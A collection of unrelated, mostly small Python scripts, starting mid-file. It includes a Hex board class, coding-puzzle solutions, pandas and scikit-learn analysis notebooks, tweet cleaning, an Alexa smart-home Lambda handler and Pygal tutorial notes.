Return a number corresponding to the winning player,
or none if the game is not over.
"""
if self.white_groups.connected(GameMeta.EDGE1, GameMeta.EDGE2):
return GameMeta.PLAYERS['white']
elif self.black_groups.connected(GameMeta.EDGE1, GameMeta.EDGE2):
return GameMeta.PLAYERS['black']
else:
return GameMeta.PLAYERS['none']
def neighbors(self, cell: tuple) -> list:
"""
Return list of neighbors of the passed cell.
Args:
cell tuple):
"""
x = cell[0]
y = cell[1]
return [(n[0] + x, n[1] + y) for n in GameMeta.NEIGHBOR_PATTERNS
if (0 <= n[0] + x < self.size and 0 <= n[1] + y < self.size)]
def moves(self) -> list:
"""
Get a list of all moves possible on the current board.
"""
moves = []
for y in range(self.size):
for x in range(self.size):
if self.board[x, y] == GameMeta.PLAYERS['none']:
moves.append((x, y))
return moves
def __str__(self):
"""
Print an ascii representation of the game board.
Notes:
Used for gtp interface
"""
white = 'W'
black = 'B'
empty = '.'
ret = '\n'
coord_size = len(str(self.size))
offset = 1
ret += ' ' * (offset + 1)
for x in range(self.size):
ret += chr(ord('A') + x) + ' ' * offset * 2
ret += '\n'
for y in range(self.size):
ret += str(y + 1) + ' ' * (offset * 2 + coord_size - len(str(y + 1)))
for x in range(self.size):
if self.board[x, y] == GameMeta.PLAYERS['white']:
ret += white
elif self.board[x, y] == GameMeta.PLAYERS['black']:
ret += black
else:
ret += empty
ret += ' ' * offset * 2
ret += white + "\n" + ' ' * offset * (y + 1)
ret += ' ' * (offset * 2 + 1) + (black + ' ' * offset * 2) * self.size
return ret
|
'''
给定一个数字,我们按照如下规则把它翻译为字符串:0 翻译成 “a” ,1 翻译成 “b”,……,11 翻译成 “l”,……,25 翻译成 “z”。一个数字可能有多个翻译。请编程实现一个函数,用来计算一个数字有多少种不同的翻译方法。
示例 1:
输入: 12258
输出: 5
解释: 12258有5种不同的翻译,分别是"bccfi", "bwfi", "bczi", "mcfi"和"mzi"
提示:
0 <= num < 231
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/ba-shu-zi-fan-yi-cheng-zi-fu-chuan-lcof
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
'''
# 1 自己 动态 用数组存储结果 44/15
# class Solution:
# def translateNum(self, num: int) -> int:
# if num < 10: return 1
# combo_nums = [1]
# num_list = [int(char) for char in str(num)]
# # 处理idx = 1的数的翻译种类数
# combo_nums.append(2 if num_list[0] == 1 or (num_list[0] == 2 and num_list[1] <= 5) else 1)
# for i in range(2,len(num_list)):
# combo_nums.append(combo_nums[-1] + combo_nums[-2] \
# if num_list[i-1] == 1 or (num_list[i-1] == 2 and num_list[i] <= 5) else combo_nums[-1])
# return combo_nums[-1]
# 2 自己 动态 升级 用两个变量存储结果 32/14 93/25 O(n) O(n)
class Solution:
def translateNum(self, num: int) -> int:
if num < 10: return 1
num_list = [int(char) for char in str(num)]
# 处理idx = 1的数的翻译种类数
pre, cur = 1, 2 if (num_list[0] * 10 + num_list[1]) < 26 else 1
for i in range(2, len(num_list)):
pre, cur = cur, pre + cur if (num_list[i - 1] * 10 + num_list[i]) < 26 and num_list[i - 1] != 0 else cur
return cur
# 3 大佬 空间复杂度为O(1),因为没创建数字列表。从右到左依次遍历
class Solution:
def translateNum(self, num: int) -> int:
a = b = 1
y = num % 10
while num != 0:
num //= 10
x = num % 10
a, b = (a + b if 10 <= 10 * x + y <= 25 else a), a
y = x
return a
|
#!/usr/bin/env python
# coding: utf-8
# In[67]:
import pandas as pd
import scipy.stats as stats
# In[68]:
df = pd.read_csv('Tabulated_Metrics.csv', error_bad_lines=False)
# In[69]:
import matplotlib.pyplot as plt
# In[70]:
is_true = df['Project_Name']=='Project 3 - Apache Commons Collections'
# In[71]:
df = df[is_true]
# In[72]:
df.head()
# In[73]:
df['DD'] = ((df['bugs'] / df['LOC'] )) * 1000
# In[74]:
df['Relative_Churned'] = ((df['Churned_Code'] / df['LOC'] ))
# In[75]:
df.head(25)
# In[76]:
df.corr(method ='spearman')
# In[77]:
df[['Relative_Churned','DD']].corr(method ='spearman')
# In[78]:
df.plot(x='Statement_Coverage', y='DD', style='o')
# In[79]:
df_clean = df.dropna()
# In[80]:
stats.spearmanr(df_clean['Statement_Coverage'], df_clean['DD'])
# In[81]:
df[['Statement_Coverage','DD']].corr(method ='spearman')
# In[82]:
df.plot(x='Branch_Coverage', y='DD', style='o')
# In[83]:
df_clean = df.dropna()
# In[84]:
stats.spearmanr(df_clean['Branch_Coverage'], df_clean['DD'])
# In[85]:
df[['Branch_Coverage','DD']].corr(method ='spearman')
# In[86]:
df.plot(x='Branch_Coverage', y='DD', style='o')
# In[ ]:
# In[87]:
df_clean = df.dropna()
# In[88]:
stats.spearmanr(df_clean['Branch_Coverage'], df_clean['DD'])
# In[89]:
df[['Branch_Coverage','DD']].corr(method ='spearman')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Data management unit for the tweetanalyzer. """
__author__ = 'Strahinja Ivanovic'
# Import needed utilities
import re
from nltk.corpus import stopwords
import HTMLParser
html_parser = HTMLParser.HTMLParser()
APPOSTROPHES = {"'s":"is", "'re":"are", "'m":"am", "'t":"not", "'ll":"will", "ill":"I will", "im":"I am",
"wanna":"want to", "gonna": "going to"}
def cleanData(rawTweets, outputfile):
"""
Cleans the given Data according to certain text mining methods and prints the cleaned output in a textfile
:param rawTweets: Input source which has to be cleaned
:param outputfile: Name the ouput file should have
:return:
"""
NewFile = open(outputfile, 'w')
for eachline in rawTweets:
# decode to UTF-8
cleanedTweets = eachline.decode("utf8").encode('ascii', 'ignore')
# remove html tags
cleanedTweets = html_parser.unescape(cleanedTweets)
# lower all letters for standardization
cleanedTweets = cleanedTweets.lower()
# remove apostrophes and standardize data
cleanedTweets = [APPOSTROPHES[word] if word in APPOSTROPHES else word for word in cleanedTweets.split()]
cleanedTweets = " ".join(cleanedTweets)
# remove stopwords
#cleanedTweets = ' '.join([word for word in cleanedTweets.split() if word not in stopwords.words("english")])
# remove links
cleanedTweets = re.sub(r'http\S+', '', cleanedTweets)
# remove hasthags
cleanedTweets = re.sub(r'#\w+ ?', '', cleanedTweets)
# remove remaining special characters
cleanedTweets = re.sub('[^A-Za-z0-9 ]+','',cleanedTweets)
# print the output in a new File
NewFile.write('%s \n' % cleanedTweets)
|
import numpy as np
import cv2
import skimage
from matplotlib import pyplot as plt
from time import time
import scipy.misc
import scipy.ndimage
from sklearn.decomposition import MiniBatchDictionaryLearning
from sklearn.feature_extraction.image import extract_patches_2d
from sklearn.feature_extraction.image import reconstruct_from_patches_2d
from show_with_diff import show_with_diff
from add_noise import noisy
frame = scipy.ndimage.imread('150.jpg', flatten=True, mode='L')
shape = scipy.ndimage.imread('shape.png', flatten=True, mode='L')
##Store frame in variale of type float32 (gray)
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.imshow('frame',gray)
gray = np.asarray(frame, dtype=np.float32)
gray/=255
face=gray
##Down sample for speed
#face = gray[::2, ::2] + gray[1::2, ::2] + gray[::2, 1::2] + gray[1::2, 1::2]
face /= 0.5
height, width = face.shape
# Distort the right half of the image
#'gauss' Gaussian-distributed additive noise.
#'poisson' Poisson-distributed noise generated from the data.
#'s&p' Replaces random pixels with 0 or 1.
#'speckle' Multiplicative noise using out = image + n*image,where n is uniform noise with specified mean & variance.
print('Distorting image...')
distorted = face.copy()
#distorted += 1* np.random.randn(height, width )##Gaussian noise
distorted = noisy('s&p',distorted)
#pic = distorted *255
#pic = pic.astype('uint8')
#cv2.imwrite('noised.png',pic)
cv2.imshow('distorted',distorted)
cv2.waitKey()
# Extract all reference patches from the left half of the image
print('Extracting reference patches...')
t0 = time()
patch_size = (7, 7)
data = extract_patches_2d(shape, patch_size)
data = data.reshape(data.shape[0], -1)
data -= np.mean(data, axis=0)
data /= np.std(data, axis=0)
print('done in %.2fs.' % (time() - t0))
# #############################################################################
# Learn the dictionary from reference patches
print('Learning the dictionary...')
t0 = time()
dico = MiniBatchDictionaryLearning(n_components=200, alpha=1, n_iter=500)
V = dico.fit(data).components_
dt = time() - t0
print('done in %.2fs.' % dt)
# #############################################################################
# Extract noisy patches and reconstruct them using the dictionary
print('Extracting noisy patches... ')
t0 = time()
data = extract_patches_2d(distorted, patch_size)
data = data.reshape(data.shape[0], -1)
intercept = np.mean(data, axis=0)
data -= intercept
print('done in %.2fs.' % (time() - t0))
transform_algorithms = [
('Orthogonal Matching Pursuit\n1 atom', 'omp',
{'transform_n_nonzero_coefs': 1})]
reconstructions = {}
for title, transform_algorithm, kwargs in transform_algorithms:
print(title + '...')
reconstructions[title] = face.copy()
t0 = time()
dico.set_params(transform_algorithm=transform_algorithm, **kwargs)
code = dico.transform(data)
patches = np.dot(code, V)
patches += intercept
patches = patches.reshape(len(data), *patch_size)
if transform_algorithm == 'threshold':
patches -= patches.min()
patches /= patches.max()
reconstructions[title] = reconstruct_from_patches_2d(
patches, (height, width))
dt = time() - t0
print('done in %.2fs.' % dt)
show_with_diff(reconstructions[title], face,
title + ' (time: %.1fs)' % dt)
plt.show()
|
import os
import re
import sys
if re.match('maya.*', os.path.basename(sys.executable), re.IGNORECASE):
pass
# Reload libs
import libAttr
import libCtrlShapes
import libFormula
import libPython
import libQt
import libPymel
import libSkeleton
import libRigging
import libSkinning
import libStringMap
import libUtils
import libHistory
import libComponent
def _reload():
reload(libAttr)
reload(libCtrlShapes)
reload(libFormula)
reload(libPython)
reload(libQt)
reload(libPymel)
reload(libSkeleton)
reload(libRigging)
reload(libSkinning)
reload(libStringMap)
reload(libUtils)
reload(libHistory)
reload(libComponent) |
import tensorflow as tf
EMA_DECAY = 0.99
epoch = 100
ema_step = tf.Variable(initial_value=0, dtype=tf.int32, trainable=False)
ema = tf.train.ExponentialMovingAverage(decay=EMA_DECAY, num_updates=ema_step)
v = tf.Variable(100000.0, name="v", dtype=tf.float32)
# 维护影子变量,计算并保存变量的平均值,ema.average(v)返回平均值
v_ema_op = ema.apply([v])
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(v_ema_op)
print("开始值:{0}".format(sess.run([v, ema.average(v)])))
sess.run(tf.assign(v, 10000.0))
for i in range(epoch):
# sess.run(tf.assign_add(v, 100))
print("v={0}, num_step={1},decay={2}".format(sess.run(v), sess.run(ema_step),
sess.run(tf.minimum(EMA_DECAY, tf.cast((1+ema_step)/(10+ema_step), tf.float32)))))
sess.run(v_ema_op)
print(sess.run([v, ema.average(v)]))
sess.run(tf.assign_add(ema_step,1))
|
from collections import defaultdict
from tkinter import EW
from typing import Any, Dict, List
import numpy as np
import os
from sklearn.decomposition import PCA
import io
colours = defaultdict(lambda: 'lightblue', **{
'af': '#F51AA4',
'en': 'pink',
'de': '#7CFFCB'
})
# These words were translated using a combination of google translate and my own translations.
# The latter few words were gotten from: https://www.englishclub.com/vocabulary/common-nouns-25.htm
all_words = {
'af':['koning', 'hond', 'kat', 'koningin', 'boot', 'see', 'strand', 'kroon', 'seil', 'lewe', 'man', 'vrou', 'geskiedenis', 'verlede', 'now', 'toekoms'] + ['tyd', 'persoon', 'jaar', 'manier', 'dag', 'ding', 'man', 'wêreld', 'lewe', 'hand', 'deel', 'kind', 'oog', 'vrou', 'plek', 'werk', 'week', 'saak', 'punt', 'regering', 'geselskap', 'nommer', 'groep', 'probleem', 'feit',][:10],
'en':['king', 'dog', 'cat', 'queen', 'boat', 'sea', 'beach', 'crown', 'sail', 'live', 'hamster', 'man', 'woman', 'royalty', 'history', 'story', 'past', 'present', 'future'] + ['time','person','year','way','day','thing','man','world','life','hand','part','child','eye','woman','place','work','week','case','point','government','company','number','group','problem','fact',][:10],
'de':['König', 'hund', 'katze', 'Königin', 'boot', 'meer', 'strand', 'krone', 'segel', 'lebe', 'hamster', 'mann', 'frau', 'Königtum', 'geschichte', 'geschichte', 'Vergangenheit', 'jetzt', 'Zukunft'] + ['Zeit', 'Person', 'Jahr', 'Weg', 'Tag', 'Ding', 'Mann', 'Welt', 'Leben', 'Hand', 'Teil', 'Kind', 'Auge', 'Frau', 'Platz', 'Arbeit', 'Woche', 'Fall', 'Punkt', 'Regierung', 'Unternehmen', 'Nummer', 'Gruppe', 'Problem', 'Tatsache',][:10],
}
FILENAME = '~/Downloads/wiki.{lang}.align.vec'
def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
"""Cosine similarity between a and b
Returns:
float: How similar two vectors ranging from being in opposite directions (-1) to being in the same direction (1)
"""
return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
def write(dic: Dict[str, np.ndarray], name: str):
"""Writes the dictionary into a file using the fasttext format
Args:
dic (Dict[str, np.ndarray]): Dict of word -> vector
name (str): The filename to write the dictionary to.
"""
s = f"{len(dic)} 300\n"
for key, value in dic.items():
s += f"{key} {' '.join(map(str, value))}\n"
with open(name, 'w+') as f:
f.write(s)
def main(lang: str):
"""This goes over the words given in the below code inside a file FILENAME (with lang replaced with the given language)
There must be a corresponding file in the path given by FILENAME.
This function writes some words into a smaller version of the given file, stored in 'smaller/{lang}_300_small_wiki.vec'
Args:
lang (str): The language to read and write.
"""
name = FILENAME.format(lang=lang)
words = all_words[lang]
words = list(set(words))
dic = {}
# For each word,
for word in words:
# Look for it in the given file
ans = os.popen(f"grep -i -m 1 '^{word} ' {name}").read()
# a is the first line
a = ans.split("\n")[0]
if len(a) == 0:
print(f"Word {word} is not found inside file {name}")
# Of length 301, the first word is the actual word and the rest are the vector numbers.
things = a.split(" ")
dic[things[0].lower()] = np.array(list(map(float, things[1:])))
# Save this
write(dic, f'smaller/{lang}_300_small_wiki.vec')
def load_vectors(fname: str) -> Dict[str, np.ndarray]:
"""Takes in a filename and returns a dictionary of words -> np.ndarrays representing the word vectors.
Args:
fname (str): File to read from
Returns:
Dict[str, np.ndarray]
"""
fin = io.open(fname, 'r', encoding='utf-8', newline='\n')
n, d = map(int, fin.readline().split())
data = {}
for line in fin:
tokens = line.rstrip().split(' ')
data[tokens[0]] = np.array(list(map(float, tokens[1:])))
return data
def save_js_dic(dic: Dict[str, np.ndarray], new_x: np.ndarray) -> Dict[str, Any]:
"""This takes in the dictionary, and the x values representing their reduced dimension representation
and returns a dictionary that can be used in the javascript code for the displaying of the graph
Args:
dic (Dict[str, np.ndarray]): The words and their vectors
new_x (np.ndarray): an np.ndarray of shape (len(dic), 2), containing the 2D representation of each word
Returns:
Dict[str, Any]: A JS object that contains node information.
"""
keys = list(dic.keys())
# we need a list of nodes and a distance matrix, which is actually the cosine similarity.
dic_for_js = {
'nodes': [],
'dists': [[1 for _ in range(len(keys))] for _ in range(len(keys))]
}
# The colour of a word is determined by its language
def col(w):
return colours[w.split('_')[-1].lower()]
# For all words
for index, w1 in enumerate(keys):
# for all pairs
for index2, w2 in list(enumerate(keys))[index+1:]:
va = dic[w1]
vb = dic[w2]
# write the distance
sim = cosine_similarity(va, vb)
dic_for_js['dists'][index][index2] = sim
dic_for_js['dists'][index2][index] = sim
# Add the node in, with it's PCA'd x and y position
dic_for_js['nodes'].append({'id': index, 'label': w1, 'color': col(w1), 'x': new_x[index][0], 'y': new_x[index][1]})
return (dic_for_js)
def make_js_dic_new_wiki(langs: List[str]):
"""This reads in the words and their vectors from the files, and writes the JS object representing all of the nodes
to ../web/data.js
Args:
langs (List[str]): The list of languages
"""
overall_dic = {}
for lang in langs:
# load the file
file = f'smaller/{lang}_300_small_wiki.vec'
dic = load_vectors(file)
for k in dic:
# add it to the dic with an underscore
overall_dic[k + "_" + lang.upper()] = dic[k]
# Do PCA to convert the 300D vectors to 2D
X = np.array([overall_dic[k] for k in overall_dic])
pca = PCA(n_components=2)
new_x = pca.fit_transform(X)
s = f"const data2 = {save_js_dic(overall_dic, new_x)}"
with open('../web/data.js', 'w+') as f:
f.write(s);
if __name__ == '__main__':
langs = all_words.keys()
for lang in langs:
print(f"Parsing Language {lang}")
main(lang)
make_js_dic_new_wiki(langs); exit()
|
# 박 터뜨리기 : https://www.acmicpc.net/problem/19939
N, K = map(int,input().split())
# 연속된 K개의 수를 줄세워놓고 각 +1씩하는게 최적해
# 30 4의 경우 1,2,3,4에서 각 +5하여 6,7,8,9로 3
# 31 4는 6,7,8,10으로 4이고, 이후로 33까지도 4
# 34가 되는 순간 7,8,9,10으로 다시 3
# 즉 K개일 때 최적의 경우 K-1이고, 아니면 K
# 연속으로 세울 수 없는 경우 == total보다 N이 작은 경우 : -1
total = K * (K + 1) // 2
diff = N - total
if N < total:
print(-1)
elif diff % K == 0:
print(K - 1)
else:
print(K)
|
class Solution(object):
def minWindowSize(self, str1, str2):
if len(str1) == 0 or len(str2) == 0 or len(str2) > len(str1):
return ""
len_s = len(str1)
len_t = len(str2)
dictt = {}
minSize = len_s + 1
output = ""
for c in str2:
dictt[c] = dictt.get(c, 0) + 1
i = j = 0
while i < len_s:
if str1[i] in dictt:
if dictt[str1[i]] > 0:
len_t -= 1
dictt[str1[i]] -= 1
while len_t == 0:
if i - j + 1 < minSize:
minSize = i - j + 1
output = str1[j: i+1]
if str1[j] in dictt:
dictt[str1[j]] += 1
if dictt[str1[j]] > 0:
len_t += 1
j += 1
i += 1
return "empty" if minSize == len_s + 1 else output
s = Solution()
str1 = "ADOBECODEBANC"
str2 = "ABC"
print(s.minWindowSize(str1, str2))
|
import logging
import boto3
import json
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
iotDataClient = boto3.client('iot-data')
iotClient = boto3.client('iot')
def lambda_handler(event, context):
logger.info('got event{}'.format(event))
if (event['directive']['header']['namespace'] == 'Alexa.Discovery' and
event['directive']['header']['name'] == 'Discover'):
return handleDiscovery(context, event)
elif event['directive']['header']['namespace'] == 'Alexa.PowerController':
return handlePowerControl(context, event)
#elif event['directive']['header']['namespace'] == 'Alexa.PowerLevelController':
# return handlePowerLevelControl(context, event)
#elif (event['directive']['header']['namespace'] == 'Alexa' and
# event['directive']['header']['name'] == 'ReportState'):
# return handleState(context, event)
def handleDiscovery(context, event):
#get the things from SmartyPi4home group
logger.info('got discovery request {}'.format(event))
iotResponse = iotClient.list_things_in_thing_group(
thingGroupName='SmartyPi4Home-Things',
recursive=False,
maxResults=25
)
logger.debug('available iot devices {}'.format(iotResponse))
endpoints = []
for thing in iotResponse['things']:
thingDescription = iotClient.describe_thing(thingName=thing)
logger.debug('processing thing {}'.format(thingDescription))
if thingDescription['thingTypeName'] == 'SmartyPi4Home-Outlet':
logger.debug('found smart outlet')
endpoints.append({
'endpointId': thing,
'friendlyName': thingDescription['attributes']['friendlyName'].replace('-',' '),
'description': thingDescription['attributes']['friendlyName'].replace('-',' ') + ' controlled by ' + thing,
'manufacturerName': 'SmartyPi4Home',
"displayCategories": [
"LIGHT"
],
'capabilities': [
{
'type': 'AlexaInterface',
'interface': 'Alexa.PowerController',
'version': '3',
'properties': {
'supported': [
{
'name': 'powerState'
}
],
'proactivelyReported': 'false',
'retrievable': 'false'
}
}
]
})
elif thingDescription['thingTypeName'] == 'SmartyPi4Home-Fan':
logger.debug('found smart fan')
else:
logger.error('Unable to handle thing type {}'.format(thingDescription['thingTypeName']))
return {
'event': {
'header': {
'messageId': event['directive']['header']['messageId'],
'name': 'Discover.Response',
'namespace': 'Alexa.Discovery',
'payloadVersion': '3'
},
'payload': {
'endpoints': endpoints
}
}
}
def handlePowerControl(context, event):
device_id = event['directive']['endpoint']['endpointId']
requestType = event['directive']['header']['name']
if requestType == 'TurnOn':
status = 'ON'
elif requestType == 'TurnOff':
status = 'OFF'
response = iotDataClient.update_thing_shadow(
thingName=device_id,
payload=json.dumps({
'state': {
'desired': {
'status': status
}
}
})
)
logger.info('received {}'.format(response))
return {
'context':{
'properties':[
{
'namespace': 'Alexa.PowerController',
'name': 'powerState',
'value': status
}
]
},
'event': {
'header': {
'messageId': event['directive']['header']['messageId'],
'name': 'Response',
'namespace':'Alexa',
'payloadVersion':'3'
},
'endpoint': {
'endpointId': device_id
},
'payload': {}
}
}
def handleState(context, event):
logger.info('handling status request')
endpointId = event['directive']['endpoint']['endpointId']
response = iotDataClient.get_thing_shadow(
thingName = endpointId
)
deviceShadow = json.loads(response['payload'].read())
logger.info('current shadow {}'.format(deviceShadow))
return {
'context':{
'properties':[
{
'namespace':'Alexa.PowerController',
'name':'powerState',
'value':deviceShadow['state']['reported']['status']
}
]
},
'event':{
'header':{
'messageId':event['directive']['header']['messageId'],
'namespace':'Alexa',
'name':'StateReport',
'payloadVersion':'3'
},
'endpoint':{
'endpointId':endpointId
},
'payload':{}
}
}
|
from reverse.core import utils
from reverse.core._abstract import DatabaseAbstract, DatabaseType
#Gen
import mysql.connector
import json
class MysqlService(DatabaseAbstract):
NAME = DatabaseType.MYSQL
def __init__(self) -> None:
super().__init__()
def _execute(self, operation: str, paramaters:list = []) -> any:
return self.connection.cursor().execute(operation)
def getCursor(self) -> any:
return self.connection.cursor()
def createConnector(self, *args, **kwargs):
self.connection = mysql.connector.connect(*args, **kwargs)
return self.connection |
# 当前版本 : python3.8.2
# 开发时间 : 2021/8/28 14:28
"""
在本节中,我们将使用Python可视化包Pygal来生成可缩放的矢量图形文件。
对于需要在尺寸不同的屏幕上显示的图表,这很有用,因为它们将自动缩放,以适合观看者的屏幕。
如果你打算以在线方式使用图表,请考虑使用Pygal来生成它们,这样它们在任何设备上显示时都会很美观。
在这个项目中,我们将对掷骰子的结果进行分析。掷6面的常规骰子时,可能出现的结果为1~6点,且出现每种结果的可能性相同。
然而,如果同时掷两个骰子,某些点数出现的可能性将比其他点数大。
为确定哪些点数出现的可能性最大,我们将生成一个表示掷骰子结果的数据集,并根据结果绘制出一个图形。
在数学领域,常常利用掷骰子来解释各种数据分析,但它在赌场和其他博弈场景中也得到了实际应用,在游戏《大富翁》以及众多角色扮演游戏中亦如此。
"""
# 4.1安装Pygal
# 4.2Pygal画廊
# 要了解使用Pygal可以创建什么样的图表,请查看图表类型画廊:
# 访问http://www.pygal.org/ ,单击Documentation,再单击Chart types。每个示例都包含源代码,让你知道这些图表是如何生成的。
# 4.3创建Die类
# 下面的类模拟掷一个骰子
"""
from random import randint
class Die:
#表示一个骰子的类
def __init__(self, num_sides=6):
#骰子默认为6面
self.num_sides = num_sides
def roll(self):
#返回一个位于1和骰子面数之间的随机值
return randint(1, self.num_sides)
方法__init__()接受一个可选参数。创建这个类的实例时,如果没有指定任何实参,面数默认为6;
如果指定了实参,这个值将用于设置骰子的面数。骰子是根据面数命名的,6面的骰子名为D6,8面的骰子名为D8,以此类推。
方法roll()使用函数randint()来返回一个1和面数之间的随机数。这个函数可能返回起始值1、终止值num_sides或这两个值之间的任何整数。
"""
# 4.4掷骰子
# 使用这个类来创建图表之前,先来掷D6骰子,将结果打印出来,并检查结果是否合理:
"""
from die import Die
# 创建一个D6
die = Die()
# 掷几次骰子,并将结果存储在一个列表中
results = []
for roll_num in range(100):
result = die.roll()
results.append(result)
print(results)
"""
# 4.5分析结果
# 为了分析掷一个D6骰子的结果,我们计算每个点数出现的次数
# 4.6绘制直方图
# 有了频率列表后,我们就可以绘制一个表示结果的直方图。直方图是一种条形图,指出了各种结果出现的频率。创建这种直方图的代码如下:
"""
# 对结果进行可视化
hist = pygal.Bar()
hist.title = "Results of rolling one D6 1000 times."
hist.x_labels = ['1', '2', '3', '4', '5', '6']
hist.x_title = "Result"
hist.y_title = "Frequency of Result"
hist.add('D6', frequencies)
hist.render_to_file('die_visual.svg')
为创建条形图,我们创建了一个pygal.Bar()实例,并将其存储在hist 中。
接下来,我们设置hist的属性title(用于标示直方图的字符串),将掷D6骰子的可能结果用作x轴的标签,并给每个轴都添加了标题。
使用add()将一系列值添加到图表中(向它传递要给添加的值指定的标签,还有一个列表,其中包含将出现在图表中的值)。
最后,将这个图表渲染为一个SVG文件,这种文件的扩展名必须为.svg。 要查看生成的直方图,最简单的方式是使用Web浏览器。
为此,在任何Web浏览器中新建一个标签页,再在其中打开文件die_visual.svg.
"""
# 4.7同时掷两个骰子
"""
同时掷两个骰子时,得到的点数更多,结果分布情况也不同。
下面来修改前面的代码,创建两个D6骰子,以模拟同时掷两个骰子的情况。
每次掷两个骰子时,我们都将两个骰子的点数相加,并将结果存储在results中。
复制die_visual.py并将其保存为dice_visual.py,再做如下修改:
见dice_visual
"""
# 4.8同时掷两个面数不同的骰子
# 下面来创建两个面数不同的骰子
|
lst = [1, 3, 3, 5]
def modify_list(original_list):
for element in original_list[::-1]:
if element % 2 == 1:
del original_list[original_list.index(element)]
for target in original_list:
original_list[original_list.index(target)] = target // 2
modify_list(lst)
print(lst)
|
from . import Entity
class Experiment(Entity):
def __init__(self, site, date, conductor, place = None):
self.site = site
self.date = date
self.conductor = conductor
self.place = place
self.scenario = None
self.application = None
self.deployments = {}
def set_scenario(self, scenario, application):
self.scenario = scenario
self.application = application
def set_enabler_location(self, enabler, location):
if enabler in self.deployments:
logging.warning("Ambiguous deployment information of %s during %s - using previous." % (enabler, self))
return
self.deployments[enabler] = location
def __repr__(self):
return "Experiment<%s, %s, %s>" % (self.site, self.date, self.conductor.get('name'))
def get_site(self):
return self.site
def get_scenario(self):
return self.scenario
def get_application(self):
return self.application
def get_date(self):
return self.date
|
import os
import zipfile
import csv
import json
import glob
import gzip
import json
import datetime
import demoji
import re
import pandas as pd
import emoji
def format_line(line):
line = demoji.replace(line)
line = re.sub(r"(@\S*)", "@", line)
line = re.sub(r"https://\S*", "url",line)
return line
def text_has_emoji(text):
for character in text:
if character in emoji.UNICODE_EMOJI:
return True
return False
lst_lines = []
datadir = '/data-fast/corona_tweets/'
directory = glob.glob('/data-fast/corona_tweets/geoTwitter20-05-11.zip.gz')
lst_dates = []
lst_counts = []
lst_masks = []
lst_ids = []
lst_text = []
count_total = 0
count_english = 0
count_emojis = 0
for filename in sorted(directory):
with gzip.open(filename, 'rb') as f:
name = os.path.basename(filename)
name = name[:-7]
name = name[10:]
name = "20" + name
date1 = datetime.datetime.strptime(name, "%Y-%m-%d")
print(date1)
count_day = 0
for line in f:
tweet = json.loads(line)
print(tweet['text'])
count_total = count_total+1
if tweet['lang'] == 'en':
count_english = count_english+ 1
if text_has_emoji(tweet['text']):
count_emojis =count_emojis+1
#print("total emojis = " , count_emojis)
#print("total english = " ,count_english)
#print("total count = ",count_total)
|
import urllib
import re
opener = urllib.FancyURLopener({})
day=[]
def readme(url):
count=1
f = opener.open(url)
files= f.read()
links=re.findall(r'\d\d-\d\d',files)
for i in links:
#urllib.urlretrieve(i,str(count)+".zip")
#print i
if i not in day:
print "cool"
day.append(i)
count+=1
for i in day:
print "links"
print i
readme("http://stanford.edu/class/archive/cs/cs106b/cs106b.1142/lectures/")
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
print(os.listdir("../input"))
# Any results you write to the current directory are saved as output.
titanic_train = pd.read_csv('../input/train.csv')
titanic_test = pd.read_csv('../input/test.csv')
titanic_train.head()
# In[ ]:
titanic_train.info()
# In[ ]:
#Using groupby, we can make tables computing survival rates of different group
by_sex = titanic_train.groupby('Sex')['Survived'].mean()
pd.DataFrame(by_sex)
#Female group's survival rate is 4 times larger than the male group's survival rate.
# In[ ]:
by_Pclass = titanic_train.groupby('Pclass')['Survived'].agg(['sum','count'])
by_Pclass['survival_rate'] = by_Pclass['sum'].divide(by_Pclass['count'])
by_Pclass
#The survival rate of Pclass 1 is 0.63, almost as three times that for Pclass 3.
# In[ ]:
by_sex_and_Pclass = titanic_train.groupby(['Sex', 'Pclass'])['Survived'].mean()
pd.DataFrame(by_sex_and_Pclass)
#Female group's survival rate is 4 times larger than the male group's survival rate.
# In[ ]:
#We can plot the tables above
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.barplot(x='Sex', y='Survived', data=titanic_train, ax=ax1)
sns.barplot(x ='Sex', y ='Survived', hue='Pclass', data=titanic_train, ax=ax2)
# The survival rate of female is much higher than of male.
# The survival rate of passengers in class 3 is almost half of those in class 1, independent of sex.
# For the female group, the survival rate of passengers in class 2 is similar to those in class 1;
# while for the male group, it is much lower.
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.barplot(x='Pclass', y='Survived', data=titanic_train, ax=ax1)
sns.barplot(x ='Pclass', y='Survived', hue='Sex', data = titanic_train, ax=ax2)
#The survival rate of passengers in class 1 is much higher than those in class 3.
#Females who stay in class 1 and 2 have very high rates of survival.
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.boxplot(x='Survived', y='Age', data=titanic_train, ax=ax1)
sns.barplot(x='Survived', y ='Age', hue='Sex', data=titanic_train, ax=ax2)
#Looks like inside the survived group, the age quantiles of the male group and female group are very similar.
#For the dead group, the median age of the male group is a bit larger than the median age of the female group.
# In[ ]:
#It may be better to create age_range and compare survival rate among different age_range groups.
bins = [0, 5, 16, 30, 45, 60, 75, 80]
age_range = ['0-5', '5-16', '16-30','30-45', '45-60', '60-75', '75-']
titanic_train['age_range'] = pd.cut(titanic_train['Age'], bins, labels=age_range)
#Groupby age_range
by_age_range = titanic_train.groupby('age_range')['Survived'].mean()
print(by_age_range)
#Among the groups, the infant group has the highest survival rate at 70%. The 16-30 group has the lowest rate at 36%.
sns.barplot(x='age_range', y='Survived', data=titanic_train)
# In[ ]:
by_embarked = titanic_train.groupby(['Embarked', 'Sex'])['Survived'].mean()
by_embarked
#It is very interesting that males who embarked from C=Charbough has much higher rate of survival.
# In[ ]:
titanic_train.groupby(['Embarked', 'Sex'])['Name'].count()
